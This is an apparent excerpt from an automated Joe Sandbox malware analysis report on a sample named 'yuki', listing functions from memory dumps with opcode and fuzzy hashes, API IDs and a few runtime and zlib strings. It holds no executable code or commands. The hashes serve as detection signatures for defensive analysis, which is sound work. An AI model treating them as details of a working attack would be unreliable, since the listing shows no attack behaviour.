                                                                                                      • Associated: 00000000.00000002.2068931214.00007FF6C8234000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_7ff6c81f0000_yuki.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: $header crc mismatch$unknown header flags set
                                                                                                      • API String ID: 0-1127688429
                                                                                                      • Opcode ID: fcf6ea83c7a46010d3591867e81b0f53761d3f113121264a3729654d2d1b513f
                                                                                                      • Instruction ID: bcdab03d03f6d1cef575456db47d3dfab04989124aba627357d3fc71ba31c73b
                                                                                                      • Opcode Fuzzy Hash: fcf6ea83c7a46010d3591867e81b0f53761d3f113121264a3729654d2d1b513f
                                                                                                      • Instruction Fuzzy Hash: 33F18572A183D68BE7B58F28D088A3A3AE9FF54B45F054534DA8987B90CF7CE541C744
                                                                                                      APIs
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2068663885.00007FF6C81F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6C81F0000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2068609122.00007FF6C81F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2068707716.00007FF6C821B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2068776815.00007FF6C822E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2068776815.00007FF6C8232000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2068931214.00007FF6C8234000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_7ff6c81f0000_yuki.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: ExceptionRaise_clrfp
                                                                                                      • String ID:
                                                                                                      • API String ID: 15204871-0
                                                                                                      • Opcode ID: a4cc0e8a2f7e024105bf8074fef1866164229a93701b52dcf00f6f20498becf3
                                                                                                      • Instruction ID: ae7ccdde3f9bbcd9167d10010ff2ba5d36a77a08de1817d5f7947cf1c053215d
                                                                                                      • Opcode Fuzzy Hash: a4cc0e8a2f7e024105bf8074fef1866164229a93701b52dcf00f6f20498becf3
                                                                                                      • Instruction Fuzzy Hash: 10B16E73604B898BE725CF39C94A3687BA0F744B49F258921DA9D837A4CF3EE851C744
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2068663885.00007FF6C81F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6C81F0000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2068609122.00007FF6C81F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2068707716.00007FF6C821B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2068776815.00007FF6C822E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2068776815.00007FF6C8232000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2068931214.00007FF6C8234000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_7ff6c81f0000_yuki.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: $
                                                                                                      • API String ID: 0-227171996
                                                                                                      • Opcode ID: e57f1980f4491aea9eb328a1e81193c2bccc9a7e68d1918bb9b7207cf9600634
                                                                                                      • Instruction ID: 1bd087ef1f0371f481540333470a34c0de4a4ebe215d8fc3ea21942ad84362d4
                                                                                                      • Opcode Fuzzy Hash: e57f1980f4491aea9eb328a1e81193c2bccc9a7e68d1918bb9b7207cf9600634
                                                                                                      • Instruction Fuzzy Hash: D3E1A472A0868686EB788F3586EC13D33A0FF45B4AF145135DA8EC7694DF2DE851C788
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2068663885.00007FF6C81F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6C81F0000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2068609122.00007FF6C81F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2068707716.00007FF6C821B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2068776815.00007FF6C822E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2068776815.00007FF6C8232000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2068931214.00007FF6C8234000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_7ff6c81f0000_yuki.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: incorrect header check$invalid window size
                                                                                                      • API String ID: 0-900081337
                                                                                                      • Opcode ID: 7e7bac63e97a7e962ac1d8bc37368dc0e110af78d4507200a91f80e7c7b94e68
                                                                                                      • Instruction ID: 659efd1331c23747a6a2a6cc9d82d7d28fca0ea0ecf7c5d965b334675820b2fa
                                                                                                      • Opcode Fuzzy Hash: 7e7bac63e97a7e962ac1d8bc37368dc0e110af78d4507200a91f80e7c7b94e68
                                                                                                      • Instruction Fuzzy Hash: 4A9176B2A182C787E7B48E28C448B3E3AE9FF54755F154139DA8A86B90DF3CE541CB44
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2068663885.00007FF6C81F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6C81F0000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2068609122.00007FF6C81F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2068707716.00007FF6C821B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2068776815.00007FF6C822E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2068776815.00007FF6C8232000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2068931214.00007FF6C8234000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_7ff6c81f0000_yuki.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: e+000$gfff
                                                                                                      • API String ID: 0-3030954782
                                                                                                      • Opcode ID: c8a24eaff8c968987b4d031b15ae93849e98bcf9eddb8930961e84febef9b5bc
                                                                                                      • Instruction ID: f1bfc4654580e25a0f2d2390a624aad98babb93857339398363658f5586bc02f
                                                                                                      • Opcode Fuzzy Hash: c8a24eaff8c968987b4d031b15ae93849e98bcf9eddb8930961e84febef9b5bc
                                                                                                      • Instruction Fuzzy Hash: B3516736B182C186E7358E35DA28769ABD2E744B95F48C232CBE88BBC5CF7DD4408744
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2068663885.00007FF6C81F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6C81F0000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2068609122.00007FF6C81F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2068707716.00007FF6C821B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2068776815.00007FF6C822E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2068776815.00007FF6C8232000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2068931214.00007FF6C8234000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_7ff6c81f0000_yuki.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: gfffffff
                                                                                                      • API String ID: 0-1523873471
                                                                                                      • Opcode ID: bcab6200947a377332474fa44b4677218d40dcace4b26705986274372b0e4f91
                                                                                                      • Instruction ID: a4368e254ce062b7055d385bf13b4386734165f15480d362e2c1737238972a94
                                                                                                      • Opcode Fuzzy Hash: bcab6200947a377332474fa44b4677218d40dcace4b26705986274372b0e4f91
                                                                                                      • Instruction Fuzzy Hash: 9EA14373A0A6CA46EB31CF35A1247AA7B90AB51BC6F008232DE8D87785DF3DD401C745
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2068663885.00007FF6C81F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6C81F0000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2068609122.00007FF6C81F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2068707716.00007FF6C821B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2068776815.00007FF6C822E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2068776815.00007FF6C8232000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2068931214.00007FF6C8234000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_7ff6c81f0000_yuki.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: _invalid_parameter_noinfo
                                                                                                      • String ID: TMP
                                                                                                      • API String ID: 3215553584-3125297090
                                                                                                      • Opcode ID: 09cdd7cf7fc9e7e425d724a32e8c9d3bd5c12dba7606eca5b930980d9b4d1239
                                                                                                      • Instruction ID: 773a1d0dff18a014e05d57fe0ab9540e2c70fb35095ae0a0435a788eaa513e92
                                                                                                      • Opcode Fuzzy Hash: 09cdd7cf7fc9e7e425d724a32e8c9d3bd5c12dba7606eca5b930980d9b4d1239
                                                                                                      • Instruction Fuzzy Hash: 5B51C021B086AA51FA74AE765F2917B5290EF44BD6F484035DE8EC7786EF3CE4024288
                                                                                                      APIs
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2068663885.00007FF6C81F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6C81F0000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2068609122.00007FF6C81F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2068707716.00007FF6C821B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2068776815.00007FF6C822E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2068776815.00007FF6C8232000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2068931214.00007FF6C8234000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_7ff6c81f0000_yuki.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: HeapProcess
                                                                                                      • String ID:
                                                                                                      • API String ID: 54951025-0
                                                                                                      • Opcode ID: 1f9e0516fd534d967cb731c121838b59470578846d262458ea046ba55ab40ebf
                                                                                                      • Instruction ID: c9736dfe3b79a5aaa14d8ccfaf317dd7c12a1704a09d3abeb4418d620a80b6bb
                                                                                                      • Opcode Fuzzy Hash: 1f9e0516fd534d967cb731c121838b59470578846d262458ea046ba55ab40ebf
                                                                                                      • Instruction Fuzzy Hash: AAB09220E07A02D2EA582F316D8A21822A87F48702FA8013AC48C92330DE2C29E95744
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2068663885.00007FF6C81F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6C81F0000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2068609122.00007FF6C81F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2068707716.00007FF6C821B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2068776815.00007FF6C822E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2068776815.00007FF6C8232000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2068931214.00007FF6C8234000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_7ff6c81f0000_yuki.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 5eca4e5ff3e7205525bf20f3b63783aa462e3e7adb0228d62bb7e98ab9f5e9bb
                                                                                                      • Instruction ID: c0476f2b173473f53a38fb8b04bbc87df2e8addc77226a46d7515b32a60c46e5
                                                                                                      • Opcode Fuzzy Hash: 5eca4e5ff3e7205525bf20f3b63783aa462e3e7adb0228d62bb7e98ab9f5e9bb
                                                                                                      • Instruction Fuzzy Hash: 47D1D672E0868686EB788E3582AC23D67A0EF05B49F144235CE8D877D5DF3DD845D788
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2068663885.00007FF6C81F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6C81F0000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2068609122.00007FF6C81F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2068707716.00007FF6C821B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2068776815.00007FF6C822E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2068776815.00007FF6C8232000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2068931214.00007FF6C8234000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_7ff6c81f0000_yuki.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: e75d751cc15dfd510e55d83c6141b0e8cb11d18cbed01e0c543b372a0114c593
                                                                                                      • Instruction ID: 5db17d23dbb2c71ba9316d6934582597c20855c86feb28305ef29602d220e4fe
                                                                                                      • Opcode Fuzzy Hash: e75d751cc15dfd510e55d83c6141b0e8cb11d18cbed01e0c543b372a0114c593
                                                                                                      • Instruction Fuzzy Hash: E6C1BE722181E08BD299EB29E87947A73D1F78930EB95406BEF8747BC5CB3CA414DB10
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2068663885.00007FF6C81F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6C81F0000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2068609122.00007FF6C81F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2068707716.00007FF6C821B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2068776815.00007FF6C822E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2068776815.00007FF6C8232000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2068931214.00007FF6C8234000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_7ff6c81f0000_yuki.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: aa73bfa000bc8cd66a05f12d530b76a597660d7bda6a6781f52cf2f49ffced0b
                                                                                                      • Instruction ID: 2561522fd4f0541abfdf8859679352486dbb73d5d3d73414cf2be947c107921e
                                                                                                      • Opcode Fuzzy Hash: aa73bfa000bc8cd66a05f12d530b76a597660d7bda6a6781f52cf2f49ffced0b
                                                                                                      • Instruction Fuzzy Hash: C6B16E7290878585EB76CF39C16823C3BA0E749B49F64413ACA8E87395CF7DE841D789
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2068663885.00007FF6C81F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6C81F0000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2068609122.00007FF6C81F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2068707716.00007FF6C821B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2068776815.00007FF6C822E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2068776815.00007FF6C8232000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2068931214.00007FF6C8234000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_7ff6c81f0000_yuki.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 9611c2e0762efa78d7f6da3d8515592aa8d86601c49200b7335873453b670326
                                                                                                      • Instruction ID: 7e9b18f61980de9d63ecf16942e21d98b6157112c129fbfc8b3dad96448bbf21
                                                                                                      • Opcode Fuzzy Hash: 9611c2e0762efa78d7f6da3d8515592aa8d86601c49200b7335873453b670326
                                                                                                      • Instruction Fuzzy Hash: 11810276A083C186E774CF29A66837A6A91FB45790F004239DACD83B99DF3CE4808B44
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2068663885.00007FF6C81F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6C81F0000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2068609122.00007FF6C81F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2068707716.00007FF6C821B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2068776815.00007FF6C822E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2068776815.00007FF6C8232000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2068931214.00007FF6C8234000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_7ff6c81f0000_yuki.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: _invalid_parameter_noinfo
                                                                                                      • String ID:
                                                                                                      • API String ID: 3215553584-0
                                                                                                      • Opcode ID: 15e29a2b048034b7d11d1b87b7baa88ea743f66ca2db996e50da050e1c2114ce
                                                                                                      • Instruction ID: 40b56f38064a474a726283e5871b5c5ea2b35448d0535c9b76c0784d3a3f3eed
                                                                                                      • Opcode Fuzzy Hash: 15e29a2b048034b7d11d1b87b7baa88ea743f66ca2db996e50da050e1c2114ce
                                                                                                      • Instruction Fuzzy Hash: 3B61F972E0C29246F7748E799658A7D6680AF40762F354239D69EC3AC5DF7FEC008788
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2068663885.00007FF6C81F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6C81F0000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2068609122.00007FF6C81F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2068707716.00007FF6C821B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2068776815.00007FF6C822E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2068776815.00007FF6C8232000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2068931214.00007FF6C8234000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_7ff6c81f0000_yuki.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 8e69dfdcc94a0aa650623f7423aa354004c1f2fa01d5c1268249020d4c21f447
                                                                                                      • Instruction ID: edb7568187dac04601e8a527fc1cdb4e60b76f6ac923372ca89a34032ee7f58d
                                                                                                      • Opcode Fuzzy Hash: 8e69dfdcc94a0aa650623f7423aa354004c1f2fa01d5c1268249020d4c21f447
                                                                                                      • Instruction Fuzzy Hash: E5519336A1869186E7358F39C56822873A1EB54B5AF24413BCECD87795CF3EE843C784
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2068663885.00007FF6C81F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6C81F0000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2068609122.00007FF6C81F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2068707716.00007FF6C821B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2068776815.00007FF6C822E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2068776815.00007FF6C8232000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2068931214.00007FF6C8234000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_7ff6c81f0000_yuki.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 68a3f5aab59b2fac328bd6ba34d5b1cd1fa94c6914f84dc4a79da3b9d8ff9a98
                                                                                                      • Instruction ID: aa11f773477257acac0bf68239a0180da89373aa4e40cd769a4b07e3d546d18c
                                                                                                      • Opcode Fuzzy Hash: 68a3f5aab59b2fac328bd6ba34d5b1cd1fa94c6914f84dc4a79da3b9d8ff9a98
                                                                                                      • Instruction Fuzzy Hash: C3516E76A1869586E7348F39C16823837A0EB44B69F244131CACE977A4DF3EE853C7C4
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2068663885.00007FF6C81F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6C81F0000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2068609122.00007FF6C81F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2068707716.00007FF6C821B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2068776815.00007FF6C822E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2068776815.00007FF6C8232000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2068931214.00007FF6C8234000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_7ff6c81f0000_yuki.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 27099d1c67046ba5536a5c52bb1b19252402c8bb4a5167aa336477e7b6d5f807
                                                                                                      • Instruction ID: 0812bb4796a2ca88b15f5268eadd0ce786d8582a0170c352162faa8a7a70cc09
                                                                                                      • Opcode Fuzzy Hash: 27099d1c67046ba5536a5c52bb1b19252402c8bb4a5167aa336477e7b6d5f807
                                                                                                      • Instruction Fuzzy Hash: 8F516E36A1869582E7348F39C16822837A0EB45B69F644132DE8E977D4CF3EE853C784
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2068663885.00007FF6C81F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6C81F0000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2068609122.00007FF6C81F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2068707716.00007FF6C821B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2068776815.00007FF6C822E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2068776815.00007FF6C8232000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2068931214.00007FF6C8234000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_7ff6c81f0000_yuki.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: dc981bf603441a130e1c6ba5e96f77be0c3c60e19ec03e3d560a09712d731568
                                                                                                      • Instruction ID: cf22fffb2efa3eef9abdfff6033d274e9de3932bf21f445ec9f7fe73e80986de
                                                                                                      • Opcode Fuzzy Hash: dc981bf603441a130e1c6ba5e96f77be0c3c60e19ec03e3d560a09712d731568
                                                                                                      • Instruction Fuzzy Hash: AD51B176A1869182E7348F39C16823837A5EB45B59F244131CE8E97794DF3EE843C788
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2068663885.00007FF6C81F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6C81F0000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2068609122.00007FF6C81F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2068707716.00007FF6C821B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2068776815.00007FF6C822E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2068776815.00007FF6C8232000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2068931214.00007FF6C8234000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_7ff6c81f0000_yuki.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: e734bc54909bdf7d9c6fd1772be64da5dc64d4f5bf3044a39ac3ba7850561882
                                                                                                      • Instruction ID: 7fd9a59c8308c9a9d31847d84bc896a95102ae4ace46a859ee7c767c1b4204e3
                                                                                                      • Opcode Fuzzy Hash: e734bc54909bdf7d9c6fd1772be64da5dc64d4f5bf3044a39ac3ba7850561882
                                                                                                      • Instruction Fuzzy Hash: 99519036A1879186E7358F39C26823837A1EB54B59F244136CE8D977A5CF3EE843C784
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2068663885.00007FF6C81F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6C81F0000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2068609122.00007FF6C81F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2068707716.00007FF6C821B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2068776815.00007FF6C822E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2068776815.00007FF6C8232000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2068931214.00007FF6C8234000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_7ff6c81f0000_yuki.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 3943df286285c50b07f09d339b53caaa0afa34ddfac4fad96d8a3f7ffd6ad23b
                                                                                                      • Instruction ID: 06cbb66277196bcef75f5a001804e824bf83d3b0b6440426afb6df46f3c3148e
                                                                                                      • Opcode Fuzzy Hash: 3943df286285c50b07f09d339b53caaa0afa34ddfac4fad96d8a3f7ffd6ad23b
                                                                                                      • Instruction Fuzzy Hash: 9C518036A1869186E7348F39C16833837A1EB45B59F244131CE8E977A5CF3EE942D7C4
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2068663885.00007FF6C81F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6C81F0000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2068609122.00007FF6C81F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2068707716.00007FF6C821B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2068776815.00007FF6C822E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2068776815.00007FF6C8232000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2068931214.00007FF6C8234000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
